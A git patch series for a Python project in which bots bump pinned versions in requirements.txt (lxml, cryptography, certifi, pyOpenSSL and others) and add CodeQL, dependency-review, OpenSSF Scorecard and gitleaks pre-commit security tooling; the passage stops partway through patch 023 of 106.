From dd1a80c3aaf6a22248c92b27c063cf8100d4861e Mon Sep 17 00:00:00 2001 From: snyk-bot Date: Wed, 15 Dec 2021 12:52:58 +0000 Subject: [PATCH 001/106] fix: requirements.txt to reduce vulnerabilities The following vulnerabilities are fixed by pinning transitive dependencies: - https://snyk.io/vuln/SNYK-PYTHON-LXML-2316995 --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 1daeb09..cae5f9d 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==2.6.dev1 defusedxml==0.5.0 eight==0.4.2 future==0.16.0 -lxml==4.3.2 +lxml==4.6.5 pyasn1==0.4.5 pycparser==2.19 pyOpenSSL==18.0.0 From 9408a30e5586f188022cdb1b714f211e0ea3c406 Mon Sep 17 00:00:00 2001 From: "whitesource-bolt-for-github[bot]" <42819689+whitesource-bolt-for-github[bot]@users.noreply.github.com> Date: Thu, 30 Dec 2021 08:04:06 +0000 Subject: [PATCH 002/106] Add .whitesource configuration file --- .whitesource | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 .whitesource diff --git a/.whitesource b/.whitesource new file mode 100644 index 0000000..55b922e --- /dev/null +++ b/.whitesource @@ -0,0 +1,12 @@ +{ + "scanSettings": { + "baseBranches": [] + }, + "checkRunSettings": { + "vulnerableCheckRunConclusionLevel": "failure", + "displayMode": "diff" + }, + "issueSettings": { + "minSeverityLevel": "LOW" + } +} \ No newline at end of file From 2b072315af9353800c5cc49bb4a7c2ec3ffdb144 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 10 Aug 2023 04:53:17 +0000 Subject: [PATCH 003/106] Bump certifi from 2018.11.29 to 2023.7.22 Bumps [certifi](https://github.com/certifi/python-certifi) from 2018.11.29 to 2023.7.22. - [Commits](https://github.com/certifi/python-certifi/compare/2018.11.29...2023.07.22) --- updated-dependencies: - dependency-name: certifi dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 1daeb09..e191886 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==0.24.0 -certifi==2018.11.29 +certifi==2023.7.22 cffi==1.12.2 cryptography==2.6.dev1 defusedxml==0.5.0 From 6267621f30a08b532f302310b11fd5b7d3acfc2b Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 10 Aug 2023 04:59:31 +0000 Subject: [PATCH 004/106] Bump cryptography from 2.6.dev1 to 41.0.3 Bumps [cryptography](https://github.com/pyca/cryptography) from 2.6.dev1 to 41.0.3. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/commits/41.0.3) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index cae5f9d..d436d97 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==0.24.0 certifi==2018.11.29 cffi==1.12.2 -cryptography==2.6.dev1 +cryptography==41.0.3 defusedxml==0.5.0 eight==0.4.2 future==0.16.0 From 1ff3032294f385f9d1d3c1de3a325b5e9f3bf6c1 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 10 Aug 2023 04:59:32 +0000 Subject: [PATCH 005/106] Bump future from 0.16.0 to 0.18.3 Bumps [future](https://github.com/PythonCharmers/python-future) from 0.16.0 to 0.18.3. - [Release notes](https://github.com/PythonCharmers/python-future/releases) - [Changelog](https://github.com/PythonCharmers/python-future/blob/master/docs/changelog.rst) - [Commits](https://github.com/PythonCharmers/python-future/compare/v0.16.0...v0.18.3) --- updated-dependencies: - dependency-name: future dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index cae5f9d..ed9f590 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,7 +4,7 @@ cffi==1.12.2 cryptography==2.6.dev1 defusedxml==0.5.0 eight==0.4.2 -future==0.16.0 +future==0.18.3 lxml==4.6.5 pyasn1==0.4.5 pycparser==2.19 From dacfeb83018f3483f0899e8f81bb0e18d92c9a62 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 10 Aug 2023 05:00:40 +0000 Subject: [PATCH 006/106] Bump lxml from 4.3.2 to 4.9.1 Bumps [lxml](https://github.com/lxml/lxml) from 4.3.2 to 4.9.1. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-4.3.2...lxml-4.9.1) --- updated-dependencies: - dependency-name: lxml dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index b7fee4d..d6db6b2 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==2.6.dev1 defusedxml==0.5.0 eight==0.4.2 future==0.18.3 -lxml==4.6.5 +lxml==4.9.1 pyasn1==0.4.5 pycparser==2.19 pyOpenSSL==18.0.0 From 685c53b7cebdd045028d3e3124f1fec498f75970 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 28 Nov 2023 23:55:55 +0000 Subject: [PATCH 007/106] Bump cryptography from 41.0.3 to 41.0.6 Bumps [cryptography](https://github.com/pyca/cryptography) from 41.0.3 to 41.0.6. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/41.0.3...41.0.6) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index d5d0183..4a6caf8 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==0.24.0 certifi==2023.7.22 cffi==1.12.2 -cryptography==41.0.3 +cryptography==41.0.6 defusedxml==0.5.0 eight==0.4.2 future==0.18.3 From 49ab830d11b2eeda2983fb2d9eb472a34bcb74c6 Mon Sep 17 00:00:00 2001 From: StepSecurity Bot Date: Mon, 4 Mar 2024 11:10:28 +0000 Subject: [PATCH 008/106] [StepSecurity] Apply security best practices Signed-off-by: StepSecurity Bot --- .github/dependabot.yml | 6 ++ .github/workflows/codeql.yml | 78 +++++++++++++++++++++++++ .github/workflows/dependency-review.yml | 27 +++++++++ .github/workflows/scorecards.yml | 76 ++++++++++++++++++++++++ .pre-commit-config.yaml | 14 +++++ 5 files changed, 201 insertions(+) create mode 100644 .github/dependabot.yml create mode 100644 .github/workflows/codeql.yml create mode 100644 .github/workflows/dependency-review.yml create mode 100644 .github/workflows/scorecards.yml create mode 100644 .pre-commit-config.yaml diff --git a/.github/dependabot.yml b/.github/dependabot.yml new file mode 100644 index 0000000..8d20e2e --- /dev/null +++ b/.github/dependabot.yml @@ -0,0 +1,6 @@ +version: 2 +updates: + - package-ecosystem: pip + directory: / + schedule: + interval: daily diff --git a/.github/workflows/codeql.yml b/.github/workflows/codeql.yml new file mode 100644 index 0000000..2099944 --- /dev/null +++ b/.github/workflows/codeql.yml @@ -0,0 +1,78 @@ +# For most projects, this workflow file will not need changing; you simply need +# to commit it to your repository. +# +# You may wish to alter this file to override the set of languages analyzed, +# or to provide custom queries or build logic. +# +# ******** NOTE ******** +# We have attempted to detect the languages in your repository. Please check +# the `language` matrix defined below to confirm you have the correct set of +# supported CodeQL languages. +# +name: "CodeQL" + +on: + push: + branches: ["master"] + pull_request: + # The branches below must be a subset of the branches above + branches: ["master"] + schedule: + - cron: "0 0 * * 1" + +permissions: + contents: read + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ["python"] + # CodeQL supports [ $supported-codeql-languages ] + # Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support + + steps: + - name: Harden Runner + uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + + - name: Checkout repository + uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@928ff8c822d966a999092a6a35e32177899afb7c # v2.24.6 + with: + languages: ${{ matrix.language }} + # If you wish to specify custom queries, you can do so here or in a config file. + # By default, queries listed here will override any specified in a config file. + # Prefix the list here with "+" to use these queries and those in the config file. + + # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). + # If this step fails, then you should remove it and run the build manually (see below) + - name: Autobuild + uses: github/codeql-action/autobuild@928ff8c822d966a999092a6a35e32177899afb7c # v2.24.6 + + # ℹ️ Command-line programs to run using the OS shell. + # 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun + + # If the Autobuild fails above, remove it and uncomment the following three lines. + # modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance. + + # - run: | + # echo "Run, Build Application using script" + # ./location_of_script_within_repo/buildscript.sh + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@928ff8c822d966a999092a6a35e32177899afb7c # v2.24.6 + with: + category: "/language:${{matrix.language}}" diff --git a/.github/workflows/dependency-review.yml b/.github/workflows/dependency-review.yml new file mode 100644 index 0000000..3f34562 --- /dev/null +++ b/.github/workflows/dependency-review.yml @@ -0,0 +1,27 @@ +# Dependency Review Action +# +# This Action will scan dependency manifest files that change as part of a Pull Request, +# surfacing known-vulnerable versions of the packages declared or updated in the PR. +# Once installed, if the workflow run is marked as required, +# PRs introducing known-vulnerable packages will be blocked from merging. +# +# Source repository: https://github.com/actions/dependency-review-action +name: 'Dependency Review' +on: [pull_request] + +permissions: + contents: read + +jobs: + dependency-review: + runs-on: ubuntu-latest + steps: + - name: Harden Runner + uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + + - name: 'Checkout Repository' + uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + - name: 'Dependency Review' + uses: actions/dependency-review-action@0efb1d1d84fc9633afcdaad14c485cbbc90ef46c # v2.5.1 diff --git a/.github/workflows/scorecards.yml b/.github/workflows/scorecards.yml new file mode 100644 index 0000000..2ee97d5 --- /dev/null +++ b/.github/workflows/scorecards.yml @@ -0,0 +1,76 @@ +# This workflow uses actions that are not certified by GitHub. They are provided +# by a third-party and are governed by separate terms of service, privacy +# policy, and support documentation. + +name: Scorecard supply-chain security +on: + # For Branch-Protection check. Only the default branch is supported. See + # https://github.com/ossf/scorecard/blob/main/docs/checks.md#branch-protection + branch_protection_rule: + # To guarantee Maintained check is occasionally updated. See + # https://github.com/ossf/scorecard/blob/main/docs/checks.md#maintained + schedule: + - cron: '20 7 * * 2' + push: + branches: ["master"] + +# Declare default permissions as read only. +permissions: read-all + +jobs: + analysis: + name: Scorecard analysis + runs-on: ubuntu-latest + permissions: + # Needed to upload the results to code-scanning dashboard. + security-events: write + # Needed to publish results and get a badge (see publish_results below). + id-token: write + contents: read + actions: read + + steps: + - name: Harden Runner + uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + + - name: "Checkout code" + uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 + with: + persist-credentials: false + + - name: "Run analysis" + uses: ossf/scorecard-action@99c53751e09b9529366343771cc321ec74e9bd3d # v2.0.6 + with: + results_file: results.sarif + results_format: sarif + # (Optional) "write" PAT token. Uncomment the `repo_token` line below if: + # - you want to enable the Branch-Protection check on a *public* repository, or + # - you are installing Scorecards on a *private* repository + # To create the PAT, follow the steps in https://github.com/ossf/scorecard-action#authentication-with-pat. + # repo_token: ${{ secrets.SCORECARD_TOKEN }} + + # Public repositories: + # - Publish results to OpenSSF REST API for easy access by consumers + # - Allows the repository to include the Scorecard badge. + # - See https://github.com/ossf/scorecard-action#publishing-results. + # For private repositories: + # - `publish_results` will always be set to `false`, regardless + # of the value entered here. + publish_results: true + + # Upload the results as artifacts (optional). Commenting out will disable uploads of run results in SARIF + # format to the repository Actions tab. + - name: "Upload artifact" + uses: actions/upload-artifact@a8a3f3ad30e3422c9c7b888a15615d19a852ae32 # v3.1.3 + with: + name: SARIF file + path: results.sarif + retention-days: 5 + + # Upload the results to GitHub's code scanning dashboard. + - name: "Upload to code-scanning" + uses: github/codeql-action/upload-sarif@928ff8c822d966a999092a6a35e32177899afb7c # v2.24.6 + with: + sarif_file: results.sarif diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml new file mode 100644 index 0000000..b09832e --- /dev/null +++ b/.pre-commit-config.yaml @@ -0,0 +1,14 @@ +repos: +- repo: https://github.com/gitleaks/gitleaks + rev: v8.16.3 + hooks: + - id: gitleaks +- repo: https://github.com/pre-commit/pre-commit-hooks + rev: v4.4.0 + hooks: + - id: end-of-file-fixer + - id: trailing-whitespace +- repo: https://github.com/pylint-dev/pylint + rev: v2.17.2 + hooks: + - id: pylint From 431e67de29da19e7593df35cc6a4003a60a144a8 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 4 Mar 2024 11:14:24 +0000 Subject: [PATCH 009/106] Bump cryptography from 41.0.6 to 42.0.4 Bumps [cryptography](https://github.com/pyca/cryptography) from 41.0.6 to 42.0.4. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/41.0.6...42.0.4) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 4a6caf8..8cd62a6 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==0.24.0 certifi==2023.7.22 cffi==1.12.2 -cryptography==41.0.6 +cryptography==42.0.4 defusedxml==0.5.0 eight==0.4.2 future==0.18.3 From d568b6f1d1ac4db3f2ba1d46de152be6df59fc73 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 5 Mar 2024 08:11:58 +0000 Subject: [PATCH 010/106] Bump signxml from 2.6.0 to 3.2.2 Bumps [signxml](https://github.com/kislyuk/signxml) from 2.6.0 to 3.2.2. - [Release notes](https://github.com/kislyuk/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/develop/Changes.rst) - [Commits](https://github.com/kislyuk/signxml/compare/v2.6.0...v3.2.2) --- updated-dependencies: - dependency-name: signxml dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8cd62a6..857b3b9 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==4.9.1 pyasn1==0.4.5 pycparser==2.19 pyOpenSSL==18.0.0 -signxml==2.6.0 +signxml==3.2.2 six==1.12.0 From a43be13b3005e8a0f2a350a8d05ae656f6bd8300 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 5 Mar 2024 08:12:04 +0000 Subject: [PATCH 011/106] Bump future from 0.18.3 to 1.0.0 Bumps [future](https://github.com/PythonCharmers/python-future) from 0.18.3 to 1.0.0. - [Release notes](https://github.com/PythonCharmers/python-future/releases) - [Changelog](https://github.com/PythonCharmers/python-future/blob/master/docs/changelog.rst) - [Commits](https://github.com/PythonCharmers/python-future/compare/v0.18.3...v1.0.0) --- updated-dependencies: - dependency-name: future dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8cd62a6..9b73fca 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,7 +4,7 @@ cffi==1.12.2 cryptography==42.0.4 defusedxml==0.5.0 eight==0.4.2 -future==0.18.3 +future==1.0.0 lxml==4.9.1 pyasn1==0.4.5 pycparser==2.19 From 79fc89297c24fc38d733a70dcb14e7be88cb2cb7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 5 Mar 2024 08:12:06 +0000 Subject: [PATCH 012/106] Bump asn1crypto from 0.24.0 to 1.5.1 Bumps [asn1crypto](https://github.com/wbond/asn1crypto) from 0.24.0 to 1.5.1. - [Changelog](https://github.com/wbond/asn1crypto/blob/master/changelog.md) - [Commits](https://github.com/wbond/asn1crypto/compare/0.24.0...1.5.1) --- updated-dependencies: - dependency-name: asn1crypto dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8cd62a6..054adb7 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,4 +1,4 @@ -asn1crypto==0.24.0 +asn1crypto==1.5.1 certifi==2023.7.22 cffi==1.12.2 cryptography==42.0.4 From ab0817f73dce80aa3bdebfde62918342109875cd Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 5 Mar 2024 10:53:03 +0000 Subject: [PATCH 013/106] Bump certifi from 2023.7.22 to 2024.2.2 Bumps [certifi](https://github.com/certifi/python-certifi) from 2023.7.22 to 2024.2.2. - [Commits](https://github.com/certifi/python-certifi/compare/2023.07.22...2024.02.02) --- updated-dependencies: - dependency-name: certifi dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e96c7d2..f24f9b4 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2023.7.22 +certifi==2024.2.2 cffi==1.12.2 cryptography==42.0.4 defusedxml==0.5.0 From bed1db2c45a2473e8fd2cdb06737eb86cdced413 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 5 Mar 2024 10:53:21 +0000 Subject: [PATCH 014/106] Bump six from 1.12.0 to 1.16.0 Bumps [six](https://github.com/benjaminp/six) from 1.12.0 to 1.16.0. - [Changelog](https://github.com/benjaminp/six/blob/master/CHANGES) - [Commits](https://github.com/benjaminp/six/compare/1.12.0...1.16.0) --- updated-dependencies: - dependency-name: six dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e96c7d2..883d5d1 100644 --- a/requirements.txt +++ b/requirements.txt @@ -10,4 +10,4 @@ pyasn1==0.4.5 pycparser==2.19 pyOpenSSL==18.0.0 signxml==3.2.2 -six==1.12.0 +six==1.16.0 From 9c0ecef5845b59c7cfc055b261dae60b2e12c414 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 6 Mar 2024 08:29:41 +0000 Subject: [PATCH 015/106] Bump pyasn1 from 0.4.5 to 0.5.1 Bumps [pyasn1](https://github.com/pyasn1/pyasn1) from 0.4.5 to 0.5.1. - [Release notes](https://github.com/pyasn1/pyasn1/releases) - [Changelog](https://github.com/pyasn1/pyasn1/blob/main/CHANGES.rst) - [Commits](https://github.com/pyasn1/pyasn1/compare/v0.4.5...v0.5.1) --- updated-dependencies: - dependency-name: pyasn1 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ade668f..f729433 100644 --- a/requirements.txt +++ b/requirements.txt @@ -6,7 +6,7 @@ defusedxml==0.5.0 eight==0.4.2 future==1.0.0 lxml==4.9.1 -pyasn1==0.4.5 +pyasn1==0.5.1 pycparser==2.19 pyOpenSSL==18.0.0 signxml==3.2.2 From 31fc7f4e8418dc5b0c25ff56f908f15fa3af52fc Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 6 Mar 2024 08:29:45 +0000 Subject: [PATCH 016/106] Bump eight from 0.4.2 to 1.0.1 Bumps [eight](https://github.com/kislyuk/eight) from 0.4.2 to 1.0.1. - [Release notes](https://github.com/kislyuk/eight/releases) - [Changelog](https://github.com/kislyuk/eight/blob/develop/Changes.rst) - [Commits](https://github.com/kislyuk/eight/compare/v0.4.2...v1.0.1) --- updated-dependencies: - dependency-name: eight dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ade668f..18dba82 100644 --- a/requirements.txt +++ b/requirements.txt @@ -3,7 +3,7 @@ certifi==2024.2.2 cffi==1.12.2 cryptography==42.0.4 defusedxml==0.5.0 -eight==0.4.2 +eight==1.0.1 future==1.0.0 lxml==4.9.1 pyasn1==0.4.5 From 37a4a9c6a11ced0e29909d09f9d893a8f6e58036 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 6 Mar 2024 08:30:00 +0000 Subject: [PATCH 017/106] Bump cffi from 1.12.2 to 1.16.0 Bumps [cffi](https://github.com/python-cffi/cffi) from 1.12.2 to 1.16.0. - [Release notes](https://github.com/python-cffi/cffi/releases) - [Commits](https://github.com/python-cffi/cffi/compare/v1.12.2...v1.16.0) --- updated-dependencies: - dependency-name: cffi dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ade668f..fda2b28 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,6 @@ asn1crypto==1.5.1 certifi==2024.2.2 -cffi==1.12.2 +cffi==1.16.0 cryptography==42.0.4 defusedxml==0.5.0 eight==0.4.2 From d7fc6759a955df62c53b6abd12c24137eeb1f888 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sun, 10 Mar 2024 11:49:17 +0000 Subject: [PATCH 018/106] Bump lxml from 4.9.1 to 5.1.0 Bumps [lxml](https://github.com/lxml/lxml) from 4.9.1 to 5.1.0. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-4.9.1...lxml-5.1.0) --- updated-dependencies: - dependency-name: lxml dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a77c5c3..562f54b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==42.0.4 defusedxml==0.5.0 eight==1.0.1 future==1.0.0 -lxml==4.9.1 +lxml==5.1.0 pyasn1==0.5.1 pycparser==2.19 pyOpenSSL==18.0.0 From bbc5e1e8ff058ffdba80d24e5928ecfb42472ab5 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sun, 10 Mar 2024 11:50:08 +0000 Subject: [PATCH 019/106] Bump defusedxml from 0.5.0 to 0.7.1 Bumps [defusedxml](https://github.com/tiran/defusedxml) from 0.5.0 to 0.7.1. - [Release notes](https://github.com/tiran/defusedxml/releases) - [Changelog](https://github.com/tiran/defusedxml/blob/main/CHANGES.txt) - [Commits](https://github.com/tiran/defusedxml/compare/v0.5.0...v0.7.1) --- updated-dependencies: - dependency-name: defusedxml dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a77c5c3..14a1505 100644 --- a/requirements.txt +++ b/requirements.txt @@ -2,7 +2,7 @@ asn1crypto==1.5.1 certifi==2024.2.2 cffi==1.16.0 cryptography==42.0.4 -defusedxml==0.5.0 +defusedxml==0.7.1 eight==1.0.1 future==1.0.0 lxml==4.9.1 From 86fa8a740902372d2f336978f3e3f983e8feb12f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 11 Mar 2024 09:03:15 +0000 Subject: [PATCH 020/106] Bump pycparser from 2.19 to 2.21 Bumps [pycparser](https://github.com/eliben/pycparser) from 2.19 to 2.21. - [Changelog](https://github.com/eliben/pycparser/blob/main/CHANGES) - [Commits](https://github.com/eliben/pycparser/compare/release_v2.19...release_v2.21) --- updated-dependencies: - dependency-name: pycparser dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e320e13..d1eed13 100644 --- a/requirements.txt +++ b/requirements.txt @@ -7,7 +7,7 @@ eight==1.0.1 future==1.0.0 lxml==5.1.0 pyasn1==0.5.1 -pycparser==2.19 +pycparser==2.21 pyOpenSSL==18.0.0 signxml==3.2.2 six==1.16.0 From 0a856b6f6006fcb7fb6b08867fc9714875061cdf Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 11 Mar 2024 09:03:21 +0000 Subject: [PATCH 021/106] Bump cryptography from 42.0.4 to 42.0.5 Bumps [cryptography](https://github.com/pyca/cryptography) from 42.0.4 to 42.0.5. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/42.0.4...42.0.5) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e320e13..8cb2717 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2024.2.2 cffi==1.16.0 -cryptography==42.0.4 +cryptography==42.0.5 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 83cd2e6fdee24259c7a19fc57621bfb3bebeefb9 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 11 Mar 2024 09:03:25 +0000 Subject: [PATCH 022/106] Bump pyopenssl from 18.0.0 to 24.1.0 Bumps [pyopenssl](https://github.com/pyca/pyopenssl) from 18.0.0 to 24.1.0. - [Changelog](https://github.com/pyca/pyopenssl/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/pyopenssl/compare/18.0.0...24.1.0) --- updated-dependencies: - dependency-name: pyopenssl dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e320e13..6432d9e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -8,6 +8,6 @@ future==1.0.0 lxml==5.1.0 pyasn1==0.5.1 pycparser==2.19 -pyOpenSSL==18.0.0 +pyOpenSSL==24.1.0 signxml==3.2.2 six==1.16.0 From 7621e3cc735bbb20d302e399891d5bd4bb421a21 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 27 Mar 2024 09:00:04 +0000 Subject: [PATCH 023/106] Bump pyasn1 from 0.5.1 to 0.6.0 Bumps [pyasn1](https://github.com/pyasn1/pyasn1) from 0.5.1 to 0.6.0. - [Release notes](https://github.com/pyasn1/pyasn1/releases) - [Changelog](https://github.com/pyasn1/pyasn1/blob/main/CHANGES.rst) - [Commits](https://github.com/pyasn1/pyasn1/compare/v0.5.1...v0.6.0) --- updated-dependencies: - dependency-name: pyasn1 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5f07ae3..0da90d0 100644 --- a/requirements.txt +++ b/requirements.txt @@ -6,7 +6,7 @@ defusedxml==0.7.1 eight==1.0.1 future==1.0.0 lxml==5.1.0 -pyasn1==0.5.1 +pyasn1==0.6.0 pyOpenSSL==24.1.0 pycparser==2.21 signxml==3.2.2 From e52937ccb9d50ebfe21ea4c7ce14a73f03bdd769 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: 